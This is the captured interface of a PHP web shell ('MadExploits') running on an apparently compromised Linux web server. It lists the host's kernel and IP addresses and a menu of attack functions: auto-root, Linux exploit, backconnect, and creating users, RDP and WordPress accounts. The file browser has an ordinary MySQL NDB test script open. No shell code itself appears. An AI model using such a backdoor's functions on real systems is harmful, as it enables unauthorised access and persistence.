Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.221.70.17
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
ndb_big /
[ HOME SHELL ]
Name
Size
Permission
Action
bug13637411-master.opt
22
B
-rw-r--r--
bug13637411.cnf
490
B
-rw-r--r--
bug13637411.test
3.38
KB
-rw-r--r--
bug14000373.cnf
79
B
-rw-r--r--
bug14000373.result
939
B
-rw-r--r--
bug14000373.test
1.1
KB
-rw-r--r--
bug37983-master.opt
22
B
-rw-r--r--
bug37983.test
1.46
KB
-rw-r--r--
disabled.def
44
B
-rw-r--r--
end_timer.inc
138
B
-rw-r--r--
my.cnf
1.64
KB
-rw-r--r--
ndb_big_addnode.cnf
1.45
KB
-rw-r--r--
ndb_big_addnode.result
5.66
KB
-rw-r--r--
ndb_big_addnode.test
8.29
KB
-rw-r--r--
ndb_multi_tc_takeover.cnf
1.16
KB
-rw-r--r--
ndb_multi_tc_takeover.test
411
B
-rw-r--r--
ndb_verify_redo_log_queue.test
405
B
-rw-r--r--
rqg_spj-master.opt
22
B
-rw-r--r--
rqg_spj.test
1.7
KB
-rw-r--r--
run_query_with_retry.inc
435
B
-rw-r--r--
smoke.test
10.16
KB
-rw-r--r--
start_timer.inc
83
B
-rw-r--r--
suite.inc
129
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bug13637411.test
# The include statement below is a temp one for tests that are yet to #be ported to run with InnoDB, #but needs to be kept for tests that would need MyISAM in future. --source include/force_myisam_default.inc source suite.inc; source include/have_ndb.inc; result_format 2; call mtr.add_suppression("The table '.*' is full"); select version(); CREATE TABLE t1 ( c0 int unsigned not null primary key, c00 char(255) not null default '', c01 char(255) not null default '', c02 char(255) not null default '', c03 char(255) not null default '', c04 char(255) not null default '', c05 char(255) not null default '', c06 char(255) not null default '', c07 char(255) not null default '', c08 char(255) not null default '', c09 char(255) not null default '', c10 char(255) not null default '', c11 char(255) not null default '', c12 char(255) not null default '', c13 char(255) not null default '', c14 char(255) not null default '', c15 char(255) not null default '', c16 char(255) not null default '', c17 char(255) not null default '', c18 char(255) not null default '', c19 char(255) not null default '', c20 char(255) not null default '', c21 char(255) not null default '', c22 char(255) not null default '', c23 char(255) not null default '', c24 char(255) not null default '', c25 char(255) not null default '', c26 char(255) not null default '', c27 char(255) not null default '', c28 char(255) not null default '', c29 char(255) not null default '' ) COMMENT='NDB_TABLE=NOLOGGING' ENGINE=ndbcluster partition by key(c0) partitions 1; let $batch = 200; ## Load table... --echo Filling table with 15Gb of data disable_query_log; let $i = 0; let $lastgb = 0; while (`select (DATA_LENGTH / 1024 / 1024 / 1024) < 15 from INFORMATION_SCHEMA.PARTITIONS where table_name = 't1'`) { let $b = $batch; # Number of values to INSERT per batch let $separator = ; let $sql = INSERT t1 (c0) VALUES; while($b) { let $sql=$sql$separator($i*$batch + $b); let $separator = ,; dec $b; } --error 0,1297 eval $sql; if (!$mysql_errno) { inc $i; } let $gb = `select round(DATA_LENGTH / 1024 / 1024 / 1024) from INFORMATION_SCHEMA.PARTITIONS where table_name = 't1'`; if ($gb != $lastgb) { --echo $gb gb... let $lastgb = $gb; } } --echo Filling table up to 20Gb, expect error let $done = 0; while (!$done) { let $b = $batch; # Number of values to INSERT per batch let $separator = ; let $sql = INSERT t1 (c0) VALUES; while($b) { let $sql=$sql$separator($i*$batch + $b); let $separator = ,; dec $b; } --error 0,1114,1297 eval $sql; if (!$mysql_errno) { inc $i; } if ($mysql_errno == 1114) { show warnings; inc $done; } if (`select (DATA_LENGTH / 1024 / 1024 / 1024) >= 20 from INFORMATION_SCHEMA.PARTITIONS where table_name = 't1'`) { inc $done; --echo 20g loaded! } } enable_query_log; select count(*),max(c0) from t1; select (DATA_LENGTH / 1024 / 1024 / 1024) from INFORMATION_SCHEMA.PARTITIONS where table_name = 't1'; --echo Clearing table disable_query_log; while ($i > 0) { let $b = $batch; # let $separator = ; let $sql = delete from t1 where c0 in (; while($b) { let $sql=$sql$separator($i*$batch + $b); let $separator = ,; dec $b; } let $sql=$sql); source run_query_with_retry.inc; dec $i; } enable_query_log; drop table t1; ## Test suceeded exit;
Close